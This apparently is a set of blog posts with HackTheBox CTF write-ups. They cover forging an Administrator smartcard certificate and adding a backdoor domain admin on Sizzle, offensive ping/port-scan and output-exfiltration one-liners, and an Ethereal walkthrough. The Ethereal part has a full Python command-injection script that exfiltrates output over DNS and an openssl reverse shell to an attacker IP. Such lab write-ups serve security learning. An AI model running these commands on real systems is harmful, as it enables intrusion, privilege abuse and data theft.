
Creating a hardware logon token for impersonating the Administrator [>> Contents]

I have to import the certificate to a USB crypto token (which has the same type of chip as a smartcard)!

First I need to go back to the Certificate Templates console and also add the EKU Smart Card Logon. I also remove Server Authentication (superfluous extensions may or may not break something – it’s all up to the application using the certificate).

Then I re-submit the CSR for administrator@HTB.LOCAL (you don’t have to create a new CSR) and receive a new certificate with these EKUs. The certificate is imported to the local user’s store where I had created the CSR – double-click and confirm the import to Personal.

This is literally the key to the kingdom:

Fortunately, I have some SafeNet eTokens for tests!

To transfer the certificate and key, they have to be exported to a PFX file first. Again, I use certmgr.msc – Copy to File, selecting to also export the key:
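The export can also be scripted – a sketch with certutil’s -exportPFX verb (thumbprint, password, and file name are placeholders):

certutil -user -p "SomeExportPassword" -exportPFX My <thumbprint-of-the-admin-cert> admin.pfx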

I installed the SafeNet Authentication Client – middleware / crypto provider plus management tools – set a PIN, and use the function to import a certificate from a (PFX) file:

Proxies, fake DNS, and forwarding ports once more with proxychains socat [>> Contents]

The following turned out to be more difficult than expected – I am summarizing hours of testing as: Seems you cannot force Kerberos over a proxy on Windows, ‘proxychains-style’.

I tested several different proxy tools for Windows; the most promising was Proxifier. The simpler ones can’t handle the more low-level applications anyway, but Proxifier has an option to deal with Windows services – it seems it can work as a Winsock proxy. If I recall correctly, there are different sorts of proxies in Windows, and SMB uses Winsock. So at least I could finally forward SMB that way, and accessing shares anonymously works. But as soon as I want to use net use /smartcard, I see packets sent to TCP port 88, getting nowhere.

Proxifier even warned me that a certain ruby application (msf) would run into an infinite loop if I tried to proxy it :-) But I could not for the life of me get TCP 88 proxied on Windows, so I had to re-design the whole setup!

Back to Kali, and using proxychains socat to forward all the ports routed over the meterpreter session! Kali would not care about Windows protocol specifics – I’d call that ‘port laundering’!

I proxychain socat-ed nearly everything I saw in netstat on Sizzle, TCP and UDP, plus an RPC high port I saw later in wireshark.

Example command for TCP and UDP 88:

proxychains socat TCP-LISTEN:88,fork TCP:10.10.10.103:88 &
proxychains socat UDP-LISTEN:88,fork,reuseaddr UDP:10.10.10.103:88 &

UDP Ports forwarded:

88, 389, 464

TCP ports forwarded – the RPC high ports seem to change, so this list looked a bit different for every join. This is the ‘union’ of all ports I ever used.

21,80,88,135,139,389,443,445,464,593,636,3268,3269,9389,47001,49664,49665,49666,49667,49669,49679,49681,49683,49686,49692,49702,52562,52582,49701

Note that the WinRM ports 5985 and 5986 remained forwarded ‘normally’ without proxychains socat all the time! So I am using one Windows box for WinRM, and I add another Windows box to the setup as the future ‘victim’ domain member.

I did not forward DNS, as that would screw up the discovery of Kerberos and LDAP services: The Windows victim client is supposed to believe that my Kali box is the domain controller sizzle.htb.local, and it accesses it under my local 192.168.x.y address. If I forwarded DNS queries to the true sizzle DC, it would respond with service records pointing to 10.10.10.103 … which the victim Windows box would not be able to reach. I tried some crazy things with ARP poisoning, but the solution is simpler: I set up dnsmasq as a fake DNS server on my Kali box and added all the required SRV records:

dnsmasq uses the dnsmasqhosts file instead of /etc/hosts, plus settings in the dnsmasq.conf file that make the box the authoritative DNS server for htb.local:

/etc/dnsmasqhosts

192.168.x.y sizzle.htb.local

/etc/dnsmasq.conf

addn-hosts=/etc/dnsmasqhosts
no-hosts

auth-zone=/htb.local
auth-server=/htb.local/192.168.x.y

srv-host=_ldap._tcp.HTB.LOCAL,sizzle.htb.local,389
srv-host=_ldap._tcp.Default-First-Site-Name._sites.HTB.LOCAL,sizzle.htb.local,389
srv-host=_ldap._tcp.dc._msdcs.htb.local,sizzle.htb.local,389
srv-host=_ldap._tcp.Default-First-Site-Name._sites.dc._msdcs.HTB.LOCAL,sizzle.htb.local,389
srv-host=_ldap._tcp.pdc._msdcs.HTB.LOCAL,sizzle.htb.local,389
srv-host=_ldap._tcp.gc._msdcs.HTB.LOCAL,sizzle.htb.local,3268
srv-host=_ldap._tcp.Default-First-Site-Name._sites.gc._msdcs.HTB.LOCAL,sizzle.htb.local,3268
srv-host=_gc._tcp.HTB.LOCAL,sizzle.htb.local,3268
srv-host=_gc._tcp.Default-First-Site-Name._sites.HTB.LOCAL,sizzle.htb.local,3268
srv-host=_kerberos._tcp.HTB.LOCAL,sizzle.htb.local,88
srv-host=_kerberos._udp.HTB.LOCAL,sizzle.htb.local,88
srv-host=_kerberos._tcp.Default-First-Site-Name._sites.HTB.LOCAL,sizzle.htb.local,88
srv-host=_kerberos._tcp.dc._msdcs.HTB.LOCAL,sizzle.htb.local,88
srv-host=_kpasswd._tcp.HTB.LOCAL,sizzle.htb.local,464
srv-host=_kpasswd._udp.HTB.LOCAL,sizzle.htb.local,464

Resources: List of the SRV records, and how the locator process works. I am assuming that the standard name for the site was used – Default-First-Site-Name – which is confirmed by testing the record with nslookup as amanda, directly on sizzle. I omit the record containing the domain GUID, though it could be found somewhere in AD (AD Sites and Services or adsiedit.msc).

I discovered some of the ports and records I had missed step by step, by sniffing the traffic during unsuccessful domain joins and net use attempts. For example, having received the info about the proper logon server, the client sends an LDAP query over UDP 389 – easy to miss as an important port to be forwarded.

Joining a Windows client to the htb.local domain [>> Contents]

The victim client is a physical Windows 7 box. Redirecting the crypto token over RDP did work, as did connecting it via USB to a Windows VM – but I did not want to risk anything and rather used a physical USB connection.

On this Windows box I configure the internal IP address of the Kali box as the only DNS server. dnsmasq answers all queries for the htb.local domain, and forwards all other DNS queries to the internet.

I test with some of the SRV records (IP obfuscated):

nslookup
Default Server:  sizzle.htb.local
Address:  192.168.x.y

> sizzle.htb.local
Server:  sizzle.htb.local
Address:  192.168.x.y

Name:    sizzle.htb.local
Address:  192.168.x.y

> set query=SRV
> _kerberos._tcp.dc._msdcs.HTB.LOCAL
Server:  sizzle.htb.local
Address:  192.168.x.y

_kerberos._tcp.dc._msdcs.HTB.LOCAL      SRV service location:
          priority       = 0
          weight         = 0
          port           = 88
          svr hostname   = sizzle.htb.local
sizzle.htb.local        internet address = 192.168.x.y
> 

For completeness: I also add an LMHOSTS file for the domain HTB, and could thus see WINS-like names with nbtstat – but this is definitely not sufficient to locate the domain.

I join the machine to the domain using the GUI / Properties of My Computer, change computer name or domain. Enter the new domain:

Enter amanda’s credentials – she can add her box to the domain:

Welcome!

In parallel, I can check on the other Windows PC – in the PSSession – that my test machine has indeed been added to the domain!

[sizzle.htb.local]: PS C:\Users\amanda\Documents> get-adcomputer -filter *

DistinguishedName : CN=SIZZLE,OU=Domain Controllers,DC=HTB,DC=LOCAL
DNSHostName       : sizzle.HTB.LOCAL
Enabled           : True
Name              : SIZZLE
ObjectClass       : computer
ObjectGUID        : a4f7617b-9228-40b2-9e14-5b3aedb489bd
SamAccountName    : SIZZLE$
SID               : S-1-5-21-2379389067-1826974543-3574127760-1001
UserPrincipalName :

DistinguishedName : CN=TESTPC,CN=Computers,DC=HTB,DC=LOCAL
DNSHostName       :
Enabled           : True
Name              : TESTPC
ObjectClass       : computer
ObjectGUID        : 277cd1c8-0fd1-4816-a63e-bb0653c0ee59
SamAccountName    : TESTPC$
SID               : S-1-5-21-2379389067-1826974543-3574127760-3102
UserPrincipalName :

[sizzle.htb.local]: PS C:\Users\amanda\Documents>

Having recovered from the shock that this actually worked, I reboot the Windows 7 box and logon as amanda to the domain (and the PC) with her user name and password!

On the Kali box proxychains shows extensive communication over ports 88, 139, 445, 389,…, like this:

...
|S-chain|-<>-127.0.0.1:8088-<><>-10.10.10.103:445-<><>-OK
|S-chain|-<>-127.0.0.1:8088-<><>-10.10.10.103:88-<><>-OK
...

Summary of the solution so far [>> Contents]

As amanda, I confirm that I can again run the MMCs that I already used before on the Windows attack DC – yes, I can again edit certificate templates, and I can also see one more computer in AD Users and Computers :-)

  • Start hackthebox VPN on Kali.
  • Get a default User certificate for amanda once. It is persistent and will last until its or the CA’s expiry, not affected by box reset.
  • Forward WinRM ports to Windows box 1, start WinRM session.
  • Start a simple shell, from there a meterpreter shell.
  • Start a socks proxy, and route traffic through the meterpreter session.
  • Forward all ports again from Kali to your test network using proxychains socat.
  • Set up dnsmasq on Kali as the fake htb.local server, hosting all SRV records.
  • On Windows box 2, configure your Kali’s internal IP as the only DNS server.
  • Join Windows box 2 to the domain htb.local as HTB\amanda
  • Logon to Windows box 2 as amanda
  • Edit the certificate template SSL to include required EKUs.
  • Prepare a CSR with the admin’s names.
  • Submit the file at /certsrv as amanda.
  • Import the certificate, export key and cert to a PFX, import it to a smartcard.

Finally: Using the Administrator’s token! [>> Contents]

Plug in the token and try net use! The smartcard middleware prompts for the PIN, and the connection to c$ finally succeeds!

C:\hackthebox>net use \\sizzle.htb.local\c$ /smartcard
Reading smart cards........
The following errors occurred reading the smart cards on the system:
No card on reader 2
No card on reader 3
No card on reader 4
No card on reader 5
Using the card in reader 1.  Enter the PIN:
The command completed successfully.

C:\hackthebox>dir \\sizzle.htb.local\c$
 Volume in drive \\sizzle.htb.local\c$ has no label.
 Volume Serial Number is 9C78-BB37

 Directory of \\sizzle.htb.local\c$

03.07.2018  17:22    <DIR>          Department Shares
02.07.2018  22:29    <DIR>          inetpub
02.12.2018  04:56    <DIR>          PerfLogs
26.09.2018  06:49    <DIR>          Program Files
26.09.2018  06:49    <DIR>          Program Files (x86)
11.07.2018  23:59    <DIR>          Users
06.05.2019  15:20    <DIR>          Windows
               0 File(s)              0 bytes
               7 Dir(s)  10.516.963.328 bytes free

C:\hackthebox>type \\sizzle.htb.local\C$\users\administrator\desktop\root.txt
91c58***************************
C:\hackthebox>

As amanda, start a session as the Administrator:

runas /smartcard cmd

Again the token asks for the PIN, and I finally have a shell!

\o/

Creating a (not really stealthy) backdoor admin [>> Contents]

I can now create another domain admin – I don’t even have to bother with powershell or net use, as I can start any GUI tool directly from that shell, e.g.

C:\Windows\system32\dsa.msc

Create a Test OU container and a Test User within it:

Add the user to some interesting groups:

Switch the user and logon as HTB\testuser. Now I have my own domain admin desktop!
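For completeness, the same could be done without any GUI, straight from the Administrator shell (user name and password are just illustrative):

net user testuser SomePassw0rd! /add /domain
net group "Domain Admins" testuser /add /domain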

 

Simple Ping Sweep, Port Scan, and Getting Output from Blind Remote Command Execution

Just dumping some quick and dirty one-liners! These are commands I had used to explore locked-down Windows and Linux machines, using bash or powershell when no other binaries were available or could be transferred to the boxes easily.

Trying to ping all hosts in a subnet

Linux

for i in $(seq 1 254); do host=192.168.0.$i; if timeout 0.1 ping -c 1 $host >/dev/null; then echo $host is alive; fi; done

Edit – a great improvement of this is the following, recommended by 0xdf:

for i in {1..254}; do (host=192.168.0.$i; if ping -c 1 $host > /dev/null; then echo $host alive; fi &); done

 

Windows – not the fastest as there is no timeout option for Test-Connection:

powershell -c "1..254 | % {$h='192.168.0.'+$($_); if ($(Test-Connection -Count 1 $h -ErrorAction SilentlyContinue)) { $('host '+$h+' is alive')|Write-Host}}"

Scanning open ports

Linux:

host=192.168.0.1; for port in {1..1000}; do timeout 0.1 bash -c "echo >/dev/tcp/$host/$port && echo port $port is open"; done 2>/dev/null

… or if nc is avaiable:

for port in $(seq 1 1000); do timeout 0.1 nc -zv 192.168.0.1 $port 2>&1 | grep succeeded; done

Windows – not using Test-NetConnection in order to control the timeout:

powershell -c "$s=$('192.168.0.1');1..1000 | % {$c=New-Object System.Net.Sockets.TcpClient;$c.BeginConnect($s,$_,$null,$null)|Out-Null;Start-Sleep -milli 100; if ($c.Connected) {$('port '+$_+' is open')|Write-Host }}"

Getting output back

… if all you can do is run a command blindly, and if there is an open outbound port. In the examples below 192.168.6.6 is the attacker’s host – on which you would start a listener like:

nc -lvp 80

Linux

curl -d $(whoami) 192.168.6.6

Windows

powershell -c curl 192.168.6.6 -method POST -body $(whoami)

Echo Unreadable Hex Characters in Windows: forfiles

How to transfer small files to a locked-down Windows machine? When there is no option to copy, ftp, or http GET a file. When powershell is blocked so that you can only use Windows cmd commands?

My first choice would be to use certutil: certutil is a built-in tool for certificate and PKI management. It can encode binary certificate files – resulting in the familiar PEM output, starting with “-----BEGIN CERTIFICATE-----”. But it can actually encode any binary file! So you can ‘convert’ an executable to a certificate encoded in readable characters, and copy the fake PEM certificate by echo-ing out each of its lines on the target machine. Then the original executable is recovered by decoding the file again with certutil.
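The encode/decode round trip looks like this (file names are illustrative):

certutil -encode payload.exe payload.txt
certutil -decode payload.txt payload.exe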

But what if certutil is also blocked, and you need to write / paste unreadable characters?

On Linux, you could run

echo -e "\x41"

A

But Windows echo does not have an option to translate characters encoded in hex automatically.

The command line tool forfiles allows you to do this, albeit in a somewhat convoluted way:

forfiles processes files in a directory and interprets the files’ metadata. The examples in the help information give an overview of what the tool is typically used for:

forfiles /?

FORFILES /P C:\WINDOWS /S /M DNS*.*
FORFILES /S /M *.txt /C "cmd /c type @file | more"
FORFILES /P C:\ /S /M *.bat
FORFILES /D -30 /M *.exe
/C "cmd /c echo @path 0x09 was changed 30 days ago"
FORFILES /D 01.01.2001
/C "cmd /c echo @fname is new since Jan 1st 2001"
FORFILES /D +8.5.2019 /C "cmd /c echo @fname is new today"
FORFILES /M *.exe /D +1
FORFILES /S /M *.doc /C "cmd /c echo @fsize"
FORFILES /M *.txt /C "cmd /c if @isdir==FALSE notepad.exe @file"

For each file in a filtered set a command can be executed with option /C. The interesting example is the one referring to

echo @path 0x09

The help explains:

To include special characters in the command
line, use the hexadecimal code for the character
in 0xHH format (ex. 0x09 for tab). Internal
CMD.exe commands should be preceded with
"cmd /c".

You want to run a single command, so forfiles should only match a single file. Thus create an empty directory, cd to it, and create a single dummy file within it:

C:\test>echo test >test.txt

Then run echo [hex string] for that single file, like this. It outputs the interpreted characters corresponding to the hexadecimal values:

C:\test>forfiles /c "cmd /c echo 0x410x420x430x01"

ABC☺

C:\test>

Remaining issue: Newlines are added before and after the string. Especially the one at the beginning could be problematic if the operating system tries to find the magic bytes for a certain file type there.

The first newline is removed by redirecting echo within the enclosed command (whereas redirecting the whole forfiles command would keep it)

C:\test>forfiles /c "cmd /c echo 0x410x420x430x01 >out.txt"

C:\test>type out.txt
ABC☺

C:\test>

The trailing extra line is a superfluous carriage return + linefeed. It can be removed by using the set command in this way:

set /p=[String]

This sets a variable without specifying a variable name, so the error level is set to 1. Nevertheless, the string is written out as the input prompt – without an appended line break.

C:\test>forfiles /c "cmd /c set /p=0x410x420x430x01 >out.txt"


C:\test>type out.txt
ABC☺

This command seems to ‘hang’, and you need to press ENTER once more to complete it. cmd is waiting for input here, and you can feed it input from the nul device – then the command completes in one step:

C:\test>forfiles /c "cmd /c <nul set /p=0x410x420x430x01 >out.txt"

But there is still a blank character (0x20, decimal 32) appended at the end:

C:\test>powershell Get-Content out.txt -encoding Byte
65
66
67
1
32

This blank goes away if no blank is entered between the hex string and the >:

C:\test>forfiles /c "cmd /c <nul set /p=0x410x420x430x01>out.txt"


C:\test>powershell Get-Content out.txt -encoding Byte
65
66
67
1

Remaining limitation: The contents of the variable must not begin with special characters that will trip up the set command. E.g. an equal sign at the beginning is a bad character (and it does not matter if this character is hex-encoded or not).

Ethereal @ hackthebox: Certificate-Related Rabbit Holes

This post is related to the ‘insanely’ difficult hackthebox machine Ethereal (created by egre55 and MinatoTW) that was recently retired. Beware – It is not at all a full comprehensive write-up! I zoom in on openssl, X.509 certificates, signing stuff, and related unnecessary rabbit holes that were particularly interesting to me – as somebody who recently described herself as a Dinosaur that supports some legacy (Windows) Public Key Infrastructures, like the Cobol Programmers tackling Y2K bugs.

Ethereal was insane, because it was so locked down. You got limited remote command execution by exfiltrating the output of commands over DNS, via a ‘ping’ web tool with a command injection vulnerability. In order to use that tool you had to find credentials in a password box database that was hidden in an image of a DOS floppy disk buried in other files on an FTP server. See excellent full write-ups by 0xdf and by Bernie Lim, or watch ippsec’s video.

Regarding the DNS data exfiltration, I owe a lot to m0noc’s great video tutorial. You parse the output of the command in a for loop, and exfil data in chunks that make up a ‘host name’ sent to your evil DNS server. I am embedding my RCE script below.

openssl – telnet-style

To obtain a reverse shell and to transfer files, you had to use openssl ‘creatively’ – as a telnet replacement, running a ‘double shell’ with different windows for stdin and stdout.

In order to trigger this shell as ‘the’ user – the one with the flag, named jorge – you needed to overwrite an existing Windows shortcut (.LNK) file pointing to the Visual Studio 2017 executable. I created ‘malicious’ shortcuts using the python library pylnk, on a Windows system. The folder containing that file was also the only place at all where you could write to the file system as the initial ‘web injection user’, alan. I noticed that the overwritten LNK was replaced quickly, at least every minute – so I hoped that a simulated user would also ‘click’ the file every minute.

Creating certificate and key …

openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes

Listening on the only ports open for outgoing traffic with two ‘SSL servers’:

openssl s_server -key key.pem -cert cert.pem -port 73
openssl s_server -key key.pem -cert cert.pem -port 136

The Reverse shell command to be used in the LNK file uses the ‘SSL client’:

C:\windows\System32\cmd.exe /c "C:\progra~2\openssl-v1.1.0\bin\openssl.exe s_client -quiet -connect 10.10.14.19:136 | cmd 2>&1 | C:\progra~2\openssl-v1.1.0\bin\openssl.exe s_client -connect 10.10.14.19:73 2>&1 &"

The first rabbit hole I fell into was that I used openssl more ‘creatively’ than was maybe needed. Though I found this metasploit module with a double telnet-style shell for Linux, I decided to work on replacing the LNK first, and only go for a reverse shell once a simple payload in the LNK worked.

Downside of that approach: I needed another way of transferring the LNK file! If I had had the reverse shell already, I’d have been able to use ‘half of it’ for transferring a file in the spirit of nc.

1) Run a ‘SSL server’ locally to be prepared for sending the file:

openssl s_server -quiet -key key.pem -cert cert.pem -port 73 <to_be_copied

2) Receive it using the SSL client:

openssl.exe s_client -quiet -connect 10.10.14.19:73 >to_be_copied

The usual ways to transfer files were blocked, for example certutil. certutil and certreq are the tools that are sort of an equivalent of openssl on Windows. certutil’s legit purpose is to manage the Windows PKI, manage certificate stores, analyze certificates, publish to certificate stores, download certificate revocation lists, etc. … The latter option makes it a ‘hacker tool’, because it lets you download arbitrary files like wget or curl would (depending on the version of Windows and on Defender’s vigilance, which does heuristic checks of the action performed rather than of the EXE itself).
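For reference, the well-known download invocation – one of the ‘usual ways’ that was blocked here – looks like this:

certutil -urlcache -split -f http://10.10.14.19/file.exe file.exe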

Nearly missing out on openssl

When I saw openssl – installed on Windows! – I hoped I was on to something! However, I nearly let go of openssl, as I failed to test it properly. I ran openssl help in my nslookup shell and did not get any response. Nearly every interesting EXE was blocked on Ethereal, so it did not come as a surprise that openssl seemed to be, too.

Only after I was stuck for quite a while and a kind soul gave me a nudge not to abandon openssl too fast did I realize that the openssl help output is actually sent to standard error, not standard out.

You can redirect stderr to stdout using 2>&1 – but if you run the command ‘embedded’ in the for loop (see the python script below), you’d better escape both special characters, like this:

'C:\progra~2\openssl-v1.1.0\bin\openssl.exe help 2^>^&1'

File transfer with openssl base64 and echo

My solution was to base64-encode the file locally with openssl (rather than using base64, just ‘to play it safe’), echo out the file in the DNS shell as alan on Ethereal, then base64-decode it and store it in the final location. I had issues with echoing out the full content in one line, so I did not use the -A option of openssl base64, but echoed one line after the other.

I missed that I could write to the whole folder – I believed I could only write to this single LNK file. So I had to echo to the exact same file that I would also use as the final target, like so:

type target.lnk | openssl base64 -d -out target.lnk

Below is my final RCE script for a simple ‘shell’ – either executing input commands 1:1 or special (series of) commands using shortcuts. E.g. for ‘echo-uploading’ a file, decoding, and checking the result I used

F shell.lnk
decode
showdir

In case I want to run a command without having to worry about escaping, I can also run it blind, without any output, via nslookup.

Script rce.py

import requests
import readline
import os
import sys

url = 'http://ethereal.htb:8080/'
headers = { 'Authorization' : 'Basic YWxhbjohQzQxNG0xN3k1N3IxazNzNGc0MW4h' }

server_dns = '10.10.14.19'
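# DNS exfiltration of command output: FOR /F splits each output line into up to 26 tokens,
# which are sent as labels of a DNS query (A_dns) to my fake DNS server at server_dns.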
A_dns = 'D%a.D%b.D%c.D%d.D%e.D%f.D%g.D%h.D%i.D%j.D%k.D%l.D%m.D%n.D%o.D%p.D%k.D%r.D%s.D%t.D%u.D%v.D%w.D%x.D%y.D%z.'
template = '127.0.0.1 & ( FOR /F "tokens=1-26" %a in (\'_CMD_\') DO ( nslookup ' + A_dns + ' ' + server_dns + ') )'
template_blind = '127.0.0.1 & _CMD_'
template_lnk = '( FOR /F "tokens=1-26" %a in (\'_CMD_\') DO ( nslookup ' + A_dns + ' ' + server_dns + ') )'
# CSRF protections not automated as they did not change that often
# Copy from Burp, curl etc.
postdata = { 
    '__VIEWSTATE' : '/wEPDwULLTE0OTYxODU3NjhkZG8se05Gp91AdhB+bS+3cb/nwM7/1XnvqTtUaEoqfbcF',
    '__VIEWSTATEGENERATOR' : 'CA0B0334',
    '__EVENTVALIDATION' : '/wEdAAMwTZWDrxbqRTSpQRwxTZI24CgZUgk3s462EToPmqUw3OKvLNdlnDJuHW3p+9jPAN/MZTRxLbqQfS//vLHaNSfR4/D4qt+Wcl4tw/wpixmG9w==',
    'ctl02' : ''
}

target_lnk = 'C:\Users\Public\Desktop\Shortcuts\Visual Studio 2017.lnk'
target_lnk_dos = 'C:\Users\Public\Desktop\Shortcuts\Visual~1.lnk'
target_dir = 'C:\Users\Public\Desktop\Shortcuts\\'

openssl_path = 'C:\progra~2\openssl-v1.1.0\\bin\openssl.exe'

ask = True

def create_echo(infile_name, outfile_path):
    
    # File name must not include blanks
    b64_name = infile_name + '.b64'

    echos = []

    if not os.path.isfile(infile_name):
        print 'Cannot read file!'
        return echos
    else:
        os.system('openssl base64 -in ' + infile_name + ' -out ' + b64_name)
        f = open(b64_name, 'r')
    
    i = 0
    for line in f:
        towrite = line[:-1]
        if i == 0:
            echos += [ 'cmd /c "echo ' + towrite + ' >' + outfile_path + '"' ] 
        else:
            echos += [ 'cmd /c "echo ' + towrite + ' >>' + outfile_path + '"' ] 
        print line[:-1]
        i += 1

    f.close()
    return echos

def payload(cmd):
    return template.replace('_CMD_', cmd)

def payload_blind(cmd):
    return template_blind.replace('_CMD_', cmd)

def send(payload):
    print payload
    print ''
    
    if ask == True:
       go = raw_input('Enter n for discarding the command >>: ')
    else:
       go = 'y'

    if go != 'n':
        postdata['search'] = payload
        response = requests.post(url, data=postdata, headers=(headers))
        print 'Status Code: ' + str(response.status_code)
    else:
        print 'Not sent: ' + cmd

while True:

    cmd = raw_input('\033[41m[dnsexfil_cmd]>>: \033[0m ')

    if cmd == 'quit': 
        break

    elif cmd == 'dontask':
        ask = False
        print 'ask set to: ' + str(ask)
    elif cmd == 'ask':
        ask = True
        print 'ask set to: ' + str(ask)

    elif cmd[0:2] == 'F ':
        infile = cmd[2:]
        echos = create_echo(infile, target_lnk_dos)
        link = ' & '
        cmd_all_echos = link.join(echos)
        send(payload_blind(cmd_all_echos))

    elif cmd[0:2] == 'B ':
        cmd_blind = cmd[2:]
        send(payload_blind(cmd_blind))
       
    elif cmd == 'decode':
        cmd = 'type "' + target_lnk + '" | ' + openssl_path + ' base64 -d -out "' + target_lnk + '"'
        send(payload_blind(cmd))

    elif cmd == 'showdir':
        cmd = 'dir ' + target_dir
        send(payload(cmd))

    elif cmd == 'showfile':
        cmd = 'type "' + target_lnk + '"'
        send(payload(cmd))

    else:
        send(payload(cmd))

Finding that elusive CA certificate

After I finally managed to run a shell as jorge I fell into lots of other rabbit holes – e.g. analyzing, modifying, and compiling a recent Visual Studio exploit.

Then I ran tasklist for the umpteenth time, and saw an msiexec process! And lo and behold, even my user jorge was able to run msiexec! This fact was actually not important, as I found out later that I should wait for another (admin) user to run something.

I researched ways to use an MSI for applocker bypass. As described in detail in other write-ups you could use a simple skeleton XML file to create your MSI with the WIX toolset. WIX was the perfect tool to play with at Christmas when I did this box – it’s made up of executables called light.exe, candle.exe, lit.exe, heat.exe, shine.exe, torch.exe, pyro.exe, dark.exe, melt.exe … :-)

So I also created a simple MSI, ran it as jorge, and nothing happened. Honestly, I cannot tell with hindsight whether that should have worked – just without any escalation to an admin or SYSTEM context – or whether I made an error again. But because of my focus on all things certificates and signatures, I suspected the MSI had to be signed – that would also be in line with the spirit of downlocking on this box.

Signed code only runs if the certificate is trusted. So I needed to sign the MSI either with a ‘universally’ / publicly trusted certificate (descending from a CA certified in the Microsoft Root Program), or there was possibly a key and certificate on the box I had not found yet. Both options turned out to be another good chance for falling into rabbit holes!

Testing locally with certificates in the Windows store

I used one of my Windows test CAs and issued a Code Signing certificate, then used signtool to sign a test MSI. The certificate in the store is referenced in this case by the CN of the Subject Name, which should be unique in your store:

signtool sign /n Administrator /v pingtest.msi

The MSI could be ‘installed’ and my ping worked on a test Windows box. So I knew that the signing procedure worked, but I needed a certificate chain that Ethereal would trust. With hindsight, given my false assumption that jorge would run the MSI, I should also have considered having jorge install a Root CA certificate of my liking into his (user’s) Root certificate store. It should theoretically be doable by fiddling with the registry only (see the second hilarious rabbit hole below), but normally I would use certutil for that. And certutil was definitely blocked.
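
Had certutil not been blocked, installing a root certificate of my choice into jorge’s user store would have been a one-liner along these lines (file name just a placeholder):

certutil -user -addstore Root myroot.cer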

Publicly trusted certificate

I do have one! Our Austrian health insurance smartcards have pre-deployed keys, and you can enroll for X.509 certificates for those keys. So on a typical Windows box, code signed with this ID card would run. But there is a catch: Windows does not – anymore, since Vista if I recall correctly – pre-populate the store with all the Root CAs certified by Microsoft. If you try to run a signed MSI (or visit an HTTPS website, or read a signed e-mail), then Windows will download the required root certificate as needed. But hackthebox machines are not able to access the internet.

Yet, in despair I tried, for the unlikely case that all the roots were there. Using signtool like so, it let me pick the smartcard certificate, and I was prompted for the PIN:

signtool sign /a /v pingtest.msi

So if my signed MSI had screwed up the box, I could not have denied it – a use-case of the Non-Repudiation Key Usage ;-)

Uploaded my smartcard-signed MSI. And failed to run it.

Ages-old Demo CA – and how to use openssl for signing

There was actually a CA on the box, sort of – the demoCA that comes with the openssl installation. A default CA key and certificate come with openssl, and the perl script CA.pl can be used to create ‘database-like’ files and folders. In despair I used this default CA certificate and key – maybe it was trusted as a kind of subtle joke? I did not bother to look closely at the CA certificate – otherwise I would have noticed it had expired long ago :-)

The process I tested for signing was the same I used later. As makecert is the tool that many others have used to solve this, I quickly sum up the openssl process.

You can either use the openssl ca ‘module’ – or openssl x509. The latter is a bit simpler as you do not need to prepare the CA’s ‘database’ directories.
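
Just for completeness – it is not what I ran – the openssl ca variant would look roughly like this, once CA.pl -newca has set up the database directories:

openssl ca -config openssl.cnf -in req.csr -out codesign.crt -days 500 -extfile codesign.cnf -extensions codesign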

Of course I used Windows GUI tools to create the request :-)

  • Start, Run, certmgr.msc
  • Personal, All Tasks, Advanced Operations, Create Custom Request
  • Custom PKCS#10 Request.
  • Extensions:
    Key Usage = Digital Signature
    Extended Key Usage = Code Signing
  • Private Key, Key Options: 2048 Bit
  • BASE64 encoding

The result is a BASE64 encoded ‘PEM’ certificate signing request. You can sign with the demoCA’s key like this – I did this on my Windows box.

openssl x509 -req -in req.csr -CA cacert.pem -CAkey private\cakey.pem -CAcreateserial -out codesign.crt -days 500 -extfile codesign.cnf -extensions codesign

There are different ways to make sure that the Code Signing Extended Key Usage gets carried over from the request to the certificate, or that it is ‘added again’. In the openssl.cnf config file (the default one, or one referenced via -config) you can e.g. configure copy_extensions.
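
For the openssl ca workflow that would be a single line in the CA section of openssl.cnf – shown here only as a sketch, not the config I used:

[ CA_default ]

copy_extensions = copy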

In the example above, I used a separate file for extensions. (Values seem to be case-sensitive, also on Windows).

[ codesign ]

keyUsage=digitalSignature
extendedKeyUsage=codeSigning

To complete the process, the Root CA certificate is imported into the Trusted Root Certification Authorities store in certmgr.msc, and the Code Signing certificate is imported into Personal certificates in certmgr.msc. In case the little key icon does not show up, key and certificate have not been properly united, which can be fixed with

certutil -repairstore -user my [Serial Number of the cert]

The file is signed without issues; however, the resulting chain violates basic requirements for certificate path validation: the CA’s end of life was in 1998.

certutil cacert.pem

X509 Certificate:
Version: 1
Serial Number: 04
Signature Algorithm:
Algorithm ObjectId: 1.2.840.113549.1.1.4 md5RSA
Algorithm Parameters:
05 00
Issuer:
CN=SSLeay/rsa test CA
S=QLD
C=AU
Name Hash(sha1): 4f28bdc33fb78c854e2ceb26210f981bb73ce9ea
Name Hash(md5): ee7084bbed50615d1e118ff2ada590cf

NotBefore: 10.10.1995 00:32
NotAfter: 06.07.1998 00:32

Subject:
CN=SSLeay demo server
OU=CS
O=Mincom Pty. Ltd.
S=QLD
C=AU

Weird way to find a CA certificate

This was – for me – the most hilarious part of owning this box. The mysterious Root CA had to be in the Windows registry, and I had no certutil. So I resorted to looking at the registry directly.

‘Windows Certificate stores’ are collections of different registry keys; this was the one relevant here:

C:\>reg query HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\18F7C1FCC3090203FD5BAA2F861A754976C8DD25
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\245C97DF7514E7CF2DF8BE72AE957B9E04741E85
....
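
Each of these keys stores the raw certificate plus some properties in a REG_BINARY value called Blob, so a single entry can be dumped like this (using the first thumbprint from the list above):

reg query HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\18F7C1FCC3090203FD5BAA2F861A754976C8DD25 /v Blob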

But I wanted to look into the binary certificates with those keys so I dumped each of the keys (like 18F7C1FCC3090203FD5BAA2F861A754976C8DD25) and copied the contents from the terminal to a python script. This snippet shows only a single cert in the list:

certs = [
...
